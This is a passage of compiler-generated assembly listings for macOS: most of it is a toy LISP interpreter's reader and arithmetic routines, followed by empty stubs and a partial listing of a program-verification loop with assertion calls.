%rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $1, %rax cmpq $0, %rax je LBB34_23 ## %bb.22: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -72(%rbp) ## 8-byte Spill jmp LBB34_24 LBB34_23: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -72(%rbp) ## 8-byte Spill LBB34_24: movq -72(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read_record ## -- Begin function read_record .p2align 4, 0x90 _read_record: ## @read_record .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -40(%rbp) movq %rax, -32(%rbp) LBB35_1: ## =>This Inner Loop Header: Depth=1 callq _read_char movq %rax, -16(%rbp) cmpq $0, -16(%rbp) jge LBB35_3 ## %bb.2: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB35_23 LBB35_3: ## in Loop: Header=BB35_1 Depth=1 movq -16(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -40(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -40(%rbp) ## %bb.4: ## in Loop: Header=BB35_1 Depth=1 cmpq $10, -16(%rbp) jne LBB35_1 ## %bb.5: movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, %rcx movq %rcx, -48(%rbp) movq _buffer2@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq $0, -24(%rbp) LBB35_6: ## =>This Inner Loop Header: Depth=1 cmpq $0, -32(%rbp) je LBB35_22 ## %bb.7: ## in Loop: Header=BB35_6 Depth=1 movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) cmpq $32, -16(%rbp) je LBB35_11 ## %bb.8: ## in Loop: Header=BB35_6 Depth=1 cmpq $10, -16(%rbp) je LBB35_11 ## %bb.9: ## in Loop: Header=BB35_6 Depth=1 cmpq $40, -16(%rbp) je LBB35_11 ## %bb.10: ## in Loop: Header=BB35_6 Depth=1 cmpq $41, -16(%rbp) jne LBB35_17 LBB35_11: ## in Loop: Header=BB35_6 Depth=1 cmpq $0, -24(%rbp) je LBB35_13 ## %bb.12: ## in Loop: Header=BB35_6 Depth=1 movq -24(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -48(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -48(%rbp) LBB35_13: ## in Loop: Header=BB35_6 Depth=1 movq $0, -24(%rbp) cmpq $32, -16(%rbp) je LBB35_16 ## %bb.14: ## in Loop: Header=BB35_6 Depth=1 cmpq $10, -16(%rbp) je LBB35_16 ## %bb.15: ## in Loop: Header=BB35_6 Depth=1 movq -16(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -48(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -48(%rbp) LBB35_16: ## in Loop: Header=BB35_6 Depth=1 jmp LBB35_21 LBB35_17: ## in Loop: Header=BB35_6 Depth=1 movl $32, %eax cmpq -16(%rbp), %rax jge LBB35_20 ## %bb.18: ## in Loop: Header=BB35_6 Depth=1 cmpq $127, -16(%rbp) jge LBB35_20 ## %bb.19: ## in Loop: Header=BB35_6 Depth=1 movq -16(%rbp), %rdi movq -24(%rbp), %rsi callq _cons movq %rax, -24(%rbp) LBB35_20: ## in Loop: Header=BB35_6 Depth=1 jmp LBB35_21 LBB35_21: ## in Loop: Header=BB35_6 Depth=1 jmp LBB35_6 LBB35_22: movq _buffer2@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _buffer2@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq $0, -8(%rbp) LBB35_23: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read_expr ## -- Begin function read_expr .p2align 4, 0x90 _read_expr: ## @read_expr .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) callq _read_word movq %rax, -24(%rbp) cmpq $0, -24(%rbp) jge LBB36_2 ## %bb.1: movq -24(%rbp), %rax movq %rax, -8(%rbp) jmp LBB36_14 LBB36_2: movq -24(%rbp), %rax movq _right_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB36_6 ## %bb.3: cmpq $0, -16(%rbp) je LBB36_5 ## %bb.4: movq -24(%rbp), %rax movq %rax, -8(%rbp) jmp LBB36_14 LBB36_5: movq $0, -8(%rbp) jmp LBB36_14 LBB36_6: movq -24(%rbp), %rax movq _left_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB36_13 ## %bb.7: xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -40(%rbp) movq %rax, -32(%rbp) LBB36_8: ## =>This Inner Loop Header: Depth=1 movl $1, %edi callq _read_expr movq %rax, -48(%rbp) movq _right_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB36_12 ## %bb.9: ## in Loop: Header=BB36_8 Depth=1 cmpq $0, -48(%rbp) jge LBB36_11 ## %bb.10: movq -48(%rbp), %rax movq %rax, -8(%rbp) jmp LBB36_14 LBB36_11: ## in Loop: Header=BB36_8 Depth=1 movq -48(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -40(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -40(%rbp) jmp LBB36_8 LBB36_12: movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB36_14 LBB36_13: movq -24(%rbp), %rax movq %rax, -8(%rbp) LBB36_14: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _sub1 ## -- Begin function sub1 .p2align 4, 0x90 _sub1: ## @sub1 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) cmpq $0, -16(%rbp) jne LBB37_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB37_8 LBB37_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) cmpq $49, -24(%rbp) jne LBB37_5 ## %bb.3: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) jne LBB37_5 ## %bb.4: movq $0, -8(%rbp) jmp LBB37_8 LBB37_5: cmpq $48, -24(%rbp) je LBB37_7 ## %bb.6: movq -24(%rbp), %rdi subq $1, %rdi movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _cons movq %rax, -8(%rbp) jmp LBB37_8 LBB37_7: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _sub1 movq %rax, %rsi movl $57, %edi callq _cons movq %rax, -8(%rbp) LBB37_8: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _clean_env ## -- Begin function clean_env .p2align 4, 0x90 _clean_env: ## @clean_env .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq _obj_lst@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) LBB38_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -8(%rbp) je LBB38_3 ## %bb.2: ## in Loop: Header=BB38_1 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rdi movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _cons movq %rax, %rdx movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB38_1 LBB38_3: movq _wrd_nil@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq $0, (%rax,%rcx,8) addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _restore_env ## -- Begin function restore_env .p2align 4, 0x90 _restore_env: ## @restore_env .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _obj_lst@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) LBB39_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -8(%rbp) je LBB39_5 ## %bb.2: ## in Loop: Header=BB39_1 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _cdr@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) je LBB39_4 ## %bb.3: ## in Loop: Header=BB39_1 Depth=1 movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdx movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) LBB39_4: ## in Loop: Header=BB39_1 Depth=1 movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB39_1 LBB39_5: popq %rbp retq .cfi_endproc ## -- End function .globl _bind ## -- Begin function bind .p2align 4, 0x90 _bind: ## @bind .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB40_2 ## %bb.1: jmp LBB40_4 LBB40_2: movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _bind movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movq -24(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB40_4 ## %bb.3: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _cons movq %rax, %rdx movq -24(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) LBB40_4: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _add1 ## -- Begin function add1 .p2align 4, 0x90 _add1: ## @add1 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) cmpq $0, -16(%rbp) jne LBB41_2 ## %bb.1: movl $49, %edi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, -8(%rbp) jmp LBB41_5 LBB41_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) cmpq $57, -24(%rbp) je LBB41_4 ## %bb.3: movq -24(%rbp), %rdi addq $1, %rdi movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _cons movq %rax, -8(%rbp) jmp LBB41_5 LBB41_4: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _add1 movq %rax, %rsi movl $48, %edi callq _cons movq %rax, -8(%rbp) LBB41_5: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _halve ## -- Begin function halve .p2align 4, 0x90 _halve: ## @halve .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) cmpq $0, -16(%rbp) jne LBB42_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB42_9 LBB42_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax subq $48, %rax movq %rax, -24(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rdi callq _halve movq %rax, -40(%rbp) cmpq $0, -16(%rbp) jne LBB42_4 ## %bb.3: movq $0, -32(%rbp) jmp LBB42_5 LBB42_4: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax subq $48, %rax movq %rax, -32(%rbp) LBB42_5: movq -32(%rbp), %rax movl $2, %ecx cqto idivq %rcx movq %rdx, -32(%rbp) movq -24(%rbp), %rax movl $2, %ecx cqto idivq %rcx addq $48, %rax imulq $5, -32(%rbp), %rcx addq %rcx, %rax movq %rax, -48(%rbp) cmpq $48, -48(%rbp) jne LBB42_7 ## %bb.6: cmpq $0, -40(%rbp) je LBB42_8 LBB42_7: movq -48(%rbp), %rdi movq -40(%rbp), %rsi callq _cons movq %rax, -8(%rbp) jmp LBB42_9 LBB42_8: movq $0, -8(%rbp) LBB42_9: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _write_atm ## -- Begin function write_atm .p2align 4, 0x90 _write_atm: ## @write_atm .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) cmpq $0, -8(%rbp) jne LBB43_2 ## %bb.1: jmp LBB43_3 LBB43_2: movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _write_atm movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _write_chr LBB43_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read_char ## -- Begin function read_char .p2align 4, 0x90 _read_char: ## @read_char .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq $8, -32(%rbp) movq $0, -16(%rbp) LBB44_1: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax movq %rax, %rcx addq $-1, %rcx movq %rcx, -32(%rbp) cmpq $0, %rax jle LBB44_8 ## %bb.2: ## in Loop: Header=BB44_1 Depth=1 callq _read_bit movq %rax, -24(%rbp) cmpq $0, -24(%rbp) jge LBB44_4 ## %bb.3: movq -24(%rbp), %rax movq %rax, -8(%rbp) jmp LBB44_9 LBB44_4: ## in Loop: Header=BB44_1 Depth=1 movq -24(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) je LBB44_6 ## %bb.5: ## in Loop: Header=BB44_1 Depth=1 movq $1, -24(%rbp) jmp LBB44_7 LBB44_6: ## in Loop: Header=BB44_1 Depth=1 movq $0, -24(%rbp) LBB44_7: ## in Loop: Header=BB44_1 Depth=1 movq -16(%rbp), %rax addq -16(%rbp), %rax addq -24(%rbp), %rax movq %rax, -16(%rbp) jmp LBB44_1 LBB44_8: movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB44_9: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read_word ## -- Begin function read_word .p2align 4, 0x90 _read_word: ## @read_word .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq _buffer2@GOTPCREL(%rip), %rax cmpq $0, (%rax) jne LBB45_2 ## %bb.1: movq _right_paren@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) jmp LBB45_6 LBB45_2: movq _buffer2@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq _buffer2@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _buffer2@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -16(%rbp), %rdi callq _only_digits cmpq $0, %rax je LBB45_4 ## %bb.3: movq -16(%rbp), %rdi callq _remove_leading_zeros movq %rax, %rdi callq _mk_numb movq %rax, -16(%rbp) jmp LBB45_5 LBB45_4: movq -16(%rbp), %rdi callq _lookup_word movq %rax, -16(%rbp) LBB45_5: movq -16(%rbp), %rax movq %rax, -8(%rbp) LBB45_6: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _next ## @next .zerofill __DATA,__common,_next,8,3 .globl _col ## @col .zerofill __DATA,__common,_col,8,3 .comm _time1,8,3 ## @time1 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "LISP Interpreter Run\n" L_.str.1: ## @.str.1 .asciz "\n" .comm _car,8000000,4 ## @car .comm _cdr,8000000,4 ## @cdr .comm _wrd_define,8,3 ## @wrd_define .comm _atom,2000000,4 ## @atom .comm _wrd_lambda,8,3 ## @wrd_lambda L_.str.2: ## @.str.2 .asciz "define" L_.str.3: ## @.str.3 .asciz "value" .comm _vlst,8000000,4 ## @vlst L_.str.4: ## @.str.4 .asciz "expression" L_.str.5: ## @.str.5 .asciz "()" L_.str.6: ## @.str.6 .asciz "nil != 0\n" L_.str.7: ## @.str.7 .asciz "nil" .comm _wrd_nil,8,3 ## @wrd_nil L_.str.8: ## @.str.8 .asciz "true" .comm _wrd_true,8,3 ## @wrd_true L_.str.9: ## @.str.9 .asciz "false" .comm _wrd_false,8,3 ## @wrd_false L_.str.10: ## @.str.10 .asciz "no-time-limit" .comm _wrd_no_time_limit,8,3 ## @wrd_no_time_limit L_.str.11: ## @.str.11 .asciz "out-of-time" .comm _wrd_out_of_time,8,3 ## @wrd_out_of_time L_.str.12: ## @.str.12 .asciz "out-of-data" .comm _wrd_out_of_data,8,3 ## @wrd_out_of_data L_.str.13: ## @.str.13 .asciz "success" .comm _wrd_success,8,3 ## @wrd_success L_.str.14: ## @.str.14 .asciz "failure" .comm _wrd_failure,8,3 ## @wrd_failure L_.str.15: ## @.str.15 .asciz "let" .comm _wrd_let,8,3 ## @wrd_let L_.str.16: ## @.str.16 .asciz "lambda" L_.str.17: ## @.str.17 .asciz "cadr" .comm _wrd_cadr,8,3 ## @wrd_cadr L_.str.18: ## @.str.18 .asciz "caddr" .comm _wrd_caddr,8,3 ## @wrd_caddr L_.str.19: ## @.str.19 .asciz "'" .comm _wrd_quote,8,3 ## @wrd_quote L_.str.20: ## @.str.20 .asciz "if" .comm _wrd_if,8,3 ## @wrd_if L_.str.21: ## @.str.21 .asciz "car" .comm _wrd_car,8,3 ## @wrd_car L_.str.22: ## @.str.22 .asciz "cdr" .comm _wrd_cdr,8,3 ## @wrd_cdr L_.str.23: ## @.str.23 .asciz "cons" L_.str.24: ## @.str.24 .asciz "atom" L_.str.25: ## @.str.25 .asciz "=" L_.str.26: ## @.str.26 .asciz "display" L_.str.27: ## @.str.27 .asciz "debug" L_.str.28: ## @.str.28 .asciz "append" L_.str.29: ## @.str.29 .asciz "length" L_.str.30: ## @.str.30 .asciz "<" L_.str.31: ## @.str.31 .asciz ">" L_.str.32: ## @.str.32 .asciz "<=" L_.str.33: ## @.str.33 .asciz ">=" L_.str.34: ## @.str.34 .asciz "+" L_.str.35: ## @.str.35 .asciz "*" L_.str.36: ## @.str.36 .asciz "^" L_.str.37: ## @.str.37 .asciz "-" L_.str.38: ## @.str.38 .asciz "base2-to-10" L_.str.39: ## @.str.39 .asciz "base10-to-2" L_.str.40: ## @.str.40 .asciz "size" L_.str.41: ## @.str.41 .asciz "read-bit" L_.str.42: ## @.str.42 .asciz "bits" L_.str.43: ## @.str.43 .asciz "read-exp" L_.str.44: ## @.str.44 .asciz "eval" .comm _wrd_eval,8,3 ## @wrd_eval L_.str.45: ## @.str.45 .asciz "try" .comm _wrd_try,8,3 ## @wrd_try L_.str.46: ## @.str.46 .asciz "[" .comm _left_bracket,8,3 ## @left_bracket L_.str.47: ## @.str.47 .asciz "]" .comm _right_bracket,8,3 ## @right_bracket L_.str.48: ## @.str.48 .asciz "(" .comm _left_paren,8,3 ## @left_paren L_.str.49: ## @.str.49 .asciz ")" .comm _right_paren,8,3 ## @right_paren L_.str.50: ## @.str.50 .asciz "\"" .comm _double_quote,8,3 ## @double_quote .comm _wrd_zero,8,3 ## @wrd_zero .comm _wrd_one,8,3 ## @wrd_one .comm _numb,2000000,4 ## @numb .comm _pname,8000000,4 ## @pname .comm _pf_numb,2000000,4 ## @pf_numb .comm _pf_args,2000000,4 ## @pf_args .comm _obj_lst,8,3 ## @obj_lst L_.str.51: ## @.str.51 .asciz "Storage overflow!\n" L_.str.52: ## @.str.52 .asciz "%-12s" L_.str.53: ## @.str.53 .asciz "\n%-12s" L_.str.54: ## @.str.54 .asciz " " L_.str.55: ## @.str.55 .space 1 .zerofill __DATA,__bss,_in_word2.buffer,8,3 ## @in_word2.buffer .comm _time2,8,3 ## @time2 L_.str.56: ## @.str.56 .asciz "End of LISP Run\n\nElapsed time is %.0f seconds.\n" .comm _turing_machine_tapes,8,3 ## @turing_machine_tapes .comm _display_enabled,8,3 ## @display_enabled .comm _captured_displays,8,3 ## @captured_displays .comm _q,8,3 ## @q .comm _buffer2,8,3 ## @buffer2 .subsections_via_symbols
the_stack_data/120863.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/758854.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl ___VERIFIER_assert ; -- Begin function __VERIFIER_assert .p2align 2 ___VERIFIER_assert: ; @__VERIFIER_assert .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldur w8, [x29, #-4] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_1 LBB0_1: b LBB0_2 LBB0_2: bl ___VERIFIER_error LBB0_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] bl ___VERIFIER_nondet_double fcvtzs w8, d0 stur w8, [x29, #-8] bl ___VERIFIER_nondet_double fcvtzs w8, d0 stur w8, [x29, #-12] ldur w8, [x29, #-12] mov w9, #1 str w9, [sp, #4] ; 4-byte Folded Spill subs w8, w8, #1 ldur w9, [x29, #-12] subs w9, w9, #1 mul w8, w8, w9 ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt and w0, w8, #0x1 bl ___VERIFIER_assume ldur w8, [x29, #-8] mov w10, #2 str w10, [sp] ; 4-byte Folded Spill sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #1 cset w8, eq and w0, w8, #0x1 bl ___VERIFIER_assume ldr w9, [sp] ; 4-byte Folded Reload ldr w8, [sp, #4] ; 4-byte Folded Reload ldur w10, [x29, #-12] mul w9, w9, w10 add w9, w9, #1 str w9, [sp, #16] str w8, [sp, #12] ldur w8, [x29, #-12] ldur w9, [x29, #-12] mul w8, w8, w9 ldur w9, [x29, #-8] subs w8, w8, w9 str w8, [sp, #8] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_4 Depth 2 ; Child Loop BB1_8 Depth 2 ldur w8, [x29, #-8] ldr w9, [sp, #8] add w9, w8, w9 mov w8, #4 mul w8, w8, w9 ldr w9, [sp, #16] ldr w10, [sp, #16] mul w9, w9, w10 ldr w10, [sp, #12] ldr w11, [sp, #12] mul w10, w10, w11 subs w9, w9, w10 ldr w11, [sp, #16] mov w10, #2 mul w11, w10, w11 subs w9, w9, w11 ldr w11, [sp, #12] mul w10, w10, w11 add w9, w9, w10 subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 bl ___VERIFIER_assert ldr w8, [sp, #8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: b LBB1_12 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 b LBB1_4 LBB1_4: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-8] ldr w9, [sp, #8] add w9, w8, w9 mov w8, #4 mul w8, w8, w9 ldr w9, [sp, #16] ldr w10, [sp, #16] mul w9, w9, w10 ldr w10, [sp, #12] ldr w11, [sp, #12] mul w10, w10, w11 subs w9, w9, w10 ldr w11, [sp, #16] mov w10, #2 mul w11, w10, w11 subs w9, w9, w11 ldr w11, [sp, #12] mul w10, w10, w11 add w9, w9, w10 subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 bl ___VERIFIER_assert ldr w8, [sp, #8] subs w8, w8, #0 cset w8, gt tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_6: ; in Loop: Header=BB1_4 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #12] subs w8, w8, w9 str w8, [sp, #8] ldr w8, [sp, #12] add w8, w8, #2 str w8, [sp, #12] b LBB1_4 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 b LBB1_8 LBB1_8: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-8] ldr w9, [sp, #8] add w9, w8, w9 mov w8, #4 mul w8, w8, w9 ldr w9, [sp, #16] ldr w10, [sp, #16] mul w9, w9, w10 ldr w10, [sp, #12] ldr w11, [sp, #12] mul w10, w10, w11 subs w9, w9, w10 ldr w11, [sp, #16] mov w10, #2 mul w11, w10, w11 subs w9, w9, w11 ldr w11, [sp, #12] mul w10, w10, w11 add w9, w9, w10 subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 bl ___VERIFIER_assert ldr w8, [sp, #8] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 b LBB1_11 LBB1_10: ; in Loop: Header=BB1_8 Depth=2 ldr w8, [sp, #8] ldr w9, [sp, #16] add w8, w8, w9 str w8, [sp, #8] ldr w8, [sp, #16] add w8, w8, #2 str w8, [sp, #16] b LBB1_8 LBB1_11: ; in Loop: Header=BB1_1 Depth=1 b LBB1_1 LBB1_12: ldur w9, [x29, #-8] mov w8, #4 mul w8, w8, w9 ldr w9, [sp, #16] ldr w10, [sp, #16] mul w9, w9, w10 ldr w10, [sp, #12] ldr w11, [sp, #12] mul w10, w10, w11 subs 